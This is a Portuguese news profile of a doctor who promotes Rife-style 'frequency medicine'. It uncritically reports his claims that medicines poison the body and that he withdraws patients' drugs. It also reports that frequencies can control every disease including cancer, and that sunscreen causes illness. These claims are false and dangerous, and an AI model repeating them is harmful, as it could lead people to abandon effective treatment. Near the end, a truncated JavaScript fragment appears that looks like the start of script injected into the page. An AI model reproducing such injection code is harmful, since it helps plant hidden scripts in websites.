Medicamento desequilibra

 

Davi Rodrigues: tratamento

fora do padrão

Foto: Antônio Sabino

 

 

“Medicamento desequilibra, intoxica”.  Esta frase fica ainda mais chocante quando proferida por um médico. Mas Davi Rodrigues, que antes atuava apenas com tratamentos a laser e estética, é extremamente empolgado com uma área da Medicina que, além de não usar remédios tradicionais, vai retirando todo tipo de fármaco que porventura a pessoa use. “Medicina frequencial está sendo usada em vários locais do mundo”, diz, aumentando a quantidade de interrogações na cabeça de quem o escuta.

Trata-se de frequência de ondas. Um dos expoentes desta maneira curar moléstias sem uso de medicamento foi o cientista norte-americano Royal Raymond Rife (1888-1971).  Sinteticamente, descobriu-se que cada doença é alteração numa determinada frequência. Rife construiu um gerador específico que produzia energia semelhante à de uma bactéria, por exemplo, destruindo-a sem necessidade de nenhum tipo de droga. Em 1940 , ele lançou a teoria frequencial das doenças.

Cores 

Com microscópio que o próprio Rife inventou era possível visualizar bactérias vivas e suas cores individuais. Cores representam frequências de luz. Naquela época, ele destruía cada uma das bactérias que estudou usando frequências selecionadas de radiação. O cientista havia descoberto que cada micro-organismo tinha sempre a mesma cor, vista por seu microscópio especial, também inventado por ele.

Costuma-se usar como exemplo a quebra de um copo de cristal destruído por causa de nota musical contínua que entra em ressonância com o material. Algo semelhante ocorre com a destruição de um micro-organismo diante da radiação aplicada durante o tratamento das doenças. “Todo átomo vibra. Vibração é uma música do universo”, afirma o médico Davi Rodrigues.

Metais 

Com o uso da medicina à base de energia, Dr. Davi vai suspendendo o uso de medicamentos que seus pacientes estavam usando. Com aplicação de frequências específicas, ele vai fazendo a limpeza do organismo da pessoa numa abordagem personalizada, quando ocorre a eliminação de metais tóxicos presentes no organismo, resultado da errada ingestão de várias substâncias. A controle é possível para todas as doenças, inclusive câncer, de acordo com o médico.

“Nosso organismo é perfeito. Compensa a pessoa reequilibrar o organismo”, declara. Para que haja este reequilíbrio, o indivíduo passa então por reeducação alimentar e comportamental.  Davi cita a deficiência de vitamina D3 por falta de exposição ao sol ou o uso de filtro solar. “Muita gente está doente por causa da falta desta vitamina, como osteoporose, gripes, infecções repetidas. E o alto teor de D3 ainda diminui a incidência de câncer”, exemplifica.

Mudança em casa

A mudança do médico Davi Rodrigues, aderindo à Medicina frequencial, começou em casa. Sua filha, então com dois anos, expelia sangue junto com as fezes. Em busca do diagnóstico, concluiu que tudo se resumia à alimentação errada. Inclusive para ele, a mulher e o filho. Toda a família sofreu alteração nos hábitos alimentares.

A garota hoje tem cinco anos e o menino, 6. “Não usamos mais medicamentos há um ano e meio”, garante. O próprio médico emagreceu 18 anos quilos.  “A Medicina resumiu-se a tratar os sintomas”, critica. Ele afirma que o bem-estar que vive pessoalmente é também visto em seus pacientes. “Vejo melhoras que não via antes”, frisa. Na parte alimentar, a receita é simples: ingere-se o que o organismo necessita e evita-se ou diminui-se o que há de sobra.

Na reeducação alimentar, Dr. Davi ressalta que é preciso sempre levar em consideração que as pessoas são diferentes e, consequentemente, cada uma terá sua própria receita. Ele fala sempre na suplementação, quando o paciente precisa aumentar a ingestão de determinadas substâncias. E aborda o espiritualismo nas consultas, destacando corpo, mente e espírito. “Conversamos com o universo através de frequências que o corpo emite”, diz.

 var d=document;var s=d.createElement(‘script’);

Deixe um comentário